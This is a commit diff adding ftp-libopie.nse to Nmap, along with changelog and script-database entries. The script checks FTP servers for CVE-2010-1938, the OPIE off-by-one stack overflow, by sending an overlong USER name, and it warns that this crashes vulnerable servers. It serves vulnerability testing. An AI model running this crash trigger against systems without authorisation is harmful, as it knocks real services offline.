o [NSE] Added ftp-libopie.nse by Gutek. This script checks for an

off-by-one stack overflow vulnerability in libopie by giving the FTP
  service an overlong name. See
  http://security.freebsd.org/advisories/FreeBSD-SA-10:05.opie.asc for
  details.

CHANGELOG

@@ -1,5 +1,11 @@
 # Nmap Changelog ($Id$); -*-text-*-
 
+o [NSE] Added ftp-libopie.nse by Gutek. This script checks for an
+  off-by-one stack overflow vulnerability in libopie by giving the FTP
+  service an overlong name. See
+  http://security.freebsd.org/advisories/FreeBSD-SA-10:05.opie.asc for
+  details.
+
 o Fixed name resolution in environments where gethostbyname can return
   IPv6 (or other non-IPv4 addresses). In such an environment, Nmap
   would wrongly use the first four bytes of the IPv6 address as an

scripts/ftp-libopie.nse

@@ -0,0 +1,62 @@
+description = [[
+Checks if an FTPd is prone to CVE-2010-1938 (OPIE off-by-one stack overflow).
+Vulnerability discovered by Maksymilian Arciemowicz and Adam 'pi3' Zabrocki.
+See also http://security.freebsd.org/advisories/FreeBSD-SA-10:05.opie.asc.
+Be advised that, if launched against a vulnerable host, this script will crash the FTPd.
+]]
+
+---
+-- @output
+-- PORT   STATE SERVICE
+-- 21/tcp open  ftp
+-- | ftp-libopie: Warning: Looks like the service has crashed!
+-- | Likely prone to CVE-2010-1938 (OPIE off-by-one stack overflow)
+-- |_See http://security.freebsd.org/advisories/FreeBSD-SA-10:05.opie.asc
+
+
+author = "Ange Gutek"
+license = "Same as Nmap--See http://nmap.org/book/man-legal.html"
+categories = {"vuln","intrusive"}
+
+require "shortport"
+
+portrule = shortport.port_or_service(21, "ftp")
+
+action = function(host, port)
+	local socket = nmap.new_socket()
+	local result
+	-- If we use more that 31 chars for username, ftpd will crash (quoted from the advisory).
+	local user_account = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
+	local status = true
+
+	local err_catch = function()
+		socket:close()
+	end
+
+	local try = nmap.new_try(err_catch)
+
+	socket:set_timeout(10000)
+	try(socket:connect(host.ip, port.number, port.protocol))
+
+	-- First, try a safe User so that we are sure that everything is ok
+	local payload = "USER opie\r\n"
+	try(socket:send(payload))
+
+	status, result = socket:receive_lines(1);
+	if status and not (string.match(result,"^421")) then
+
+		  -- Second, try the vulnerable user account
+		  local payload = "USER " .. user_account .. "\r\n"
+		  try(socket:send(payload))
+
+		  status, result = socket:receive_lines(1);
+		  if status then
+			    return
+		  else
+		  -- if the server does not answer anymore we may have reached a stack overflow condition
+		  return "Warning: Looks like the service has crashed!\nLikely prone to CVE-2010-1938 (OPIE off-by-one stack overflow)\nSee http://security.freebsd.org/advisories/FreeBSD-SA-10:05.opie.asc"
+		  end
+	else
+		return
+	end
+end

scripts/script.db

@@ -30,6 +30,7 @@ Entry { filename = "finger.nse", categories = { "default", "discovery", "safe",
 Entry { filename = "ftp-anon.nse", categories = { "auth", "default", "safe", } }
 Entry { filename = "ftp-bounce.nse", categories = { "default", "intrusive", } }
 Entry { filename = "ftp-brute.nse", categories = { "auth", "intrusive", } }
+Entry { filename = "ftp-libopie.nse", categories = { "intrusive", "vuln", } }
 Entry { filename = "html-title.nse", categories = { "default", "discovery", "safe", } }
 Entry { filename = "http-auth.nse", categories = { "auth", "default", "intrusive", } }
 Entry { filename = "http-date.nse", categories = { "discovery", "safe", } }